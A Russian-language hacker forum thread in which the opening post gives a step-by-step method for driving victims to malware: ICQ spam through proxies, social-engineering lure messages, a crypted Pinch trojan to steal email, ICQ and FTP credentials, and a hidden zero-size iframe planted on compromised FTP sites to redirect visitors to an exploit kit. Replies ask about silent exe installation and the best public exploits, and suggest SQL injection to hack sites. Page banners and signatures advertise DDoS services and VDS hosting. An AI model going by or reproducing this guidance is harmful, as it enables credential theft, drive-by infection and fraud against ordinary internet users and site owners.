Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Мутим трафик...


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 5

#1
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
НУ для начала нам нужно покапаьтся в интере и поискать кривых 9 значных асек... Это не сложно... ]]>Google]]> Вам в помощь. Теперь нам необходимо скачать софт для спама, самый доступный и простой в управлении на сегодняшний день был ]]>IMtale]]>, ищем версию посвежее. После этого нам нужно добыть прокси для использования Imtale во время рассылки, а точнее через них. Так же лезим в инет и начинаем их искать. Терпеть у нас почти всё готова и нам нужно только придумать сообщение которое мы будем рассылать или то что мы будем якобы рекламировать.
А) Сообщение.. Ну тут можно что то рекламировать, или пытатся развести человека на скачивание и запуск вашей программы...
Пример: Эй привет, я сегодня прогу скачал, не поверишь, она так класно открывает страницы в контакте. Вот ссылка, ]]>http://site.ru/contakt.heck.rar]]> :.. или что то подобное.
Б) Вывод человека на связку сплоитов.
Пример: оО это ты?? Привет, я видела тебя с моей сестрой вот, она выложила фотку, вот посматри ]]>http://Site.ru/index.php]]>
Но снова таки и первый и второй способ предназначен или подразумевает собой запуск файла, для этого нам нужно сам файл, я предлагаю использовать традиционный тройян Pinch.
         Снова лезим в инет, ищем там пинча, настраиваем его, статей как его юзать море, ищем так же крипор, их тоже полно и выкладывают пачками... Криптуем Pinch и делайем из него рекламу или кидаем на сплоит. После того как несколько раз его скачают по вашей ссылке, количество скачеваний зависит от красоты и качества вашей рекламы или предложения... Качаем отчёт пинча и через парсер смотрим его, там находятся мыльники, аськи и главное что мы ищем это FTP в любом проявлении. Если нашлось было, то по контакт листу или по входящим сообщениям можно поспамить, иногда даёт прекрасные результаты, спамим то же сообщение что и в аську... с icq всё понятно..
       Ну рано или позно вы найдёте FTP, для того что бы трафик с них перекатывался на ваш сплоит используем iframe, выглядит он так:
<iframe src="http://syte.ru/index.php" width="0" height="0"></iframe>
. После этого в таком же порядке продолжаем развивать наше детище, в дальгейшем грузить можног что то ещё используя лоадер для загрузок 2-3 и более файлов.
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#2
Versus71

Versus71

    Байт

  • Members
  • Pip
  • 108 сообщений
Этот ифрейм я так понимаю отвечает за скрытую подгрузку моего сайта.
<iframe src="http://syte.ru/index.php" width="0" height="0"></iframe>

А вот как сделать чтобы мой экзэшник так же подгружался в скрытом попапе и автоматом устанавливался на странице юзера?
Ни имени, ни прошлого... и нечего терять

CyberMake.ru   [Only Quality Software]

aka HIMIKAT

#3
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
exe на страницу не ставится, ток сплоитом заливаем на удалённый комп и запускаем
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#4
Versus71

Versus71

    Байт

  • Members
  • Pip
  • 108 сообщений
DarckSol
У какого из паблик сплойтов наиболее оптимальный пробив по всем популярным на данный момент браузерам?
Ни имени, ни прошлого... и нечего терять

CyberMake.ru   [Only Quality Software]

aka HIMIKAT

#5
kiki

kiki

    Бит

  • Members
  • 10 сообщений
самый тупой способой генерации траффика

#6
st@ff

st@ff

    Бит

  • Members
  • 4 сообщений
посложнее эт взлом более-менее посещаемых сайтов(см. по тиц) и вставка iframe,а иногда и всей связки прям в сайт(за искл.лоадера) - тут нужно читать темы про уязвимости кмс,форумов, sql-inject.. либо иметь знакомого.. трафф будет окуенен и доставлять ;)
и наконец можно выкладывать склейки в раздел софта со взломанных акков ньюсмейкеров либо пиплов с дофига мессаджами


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных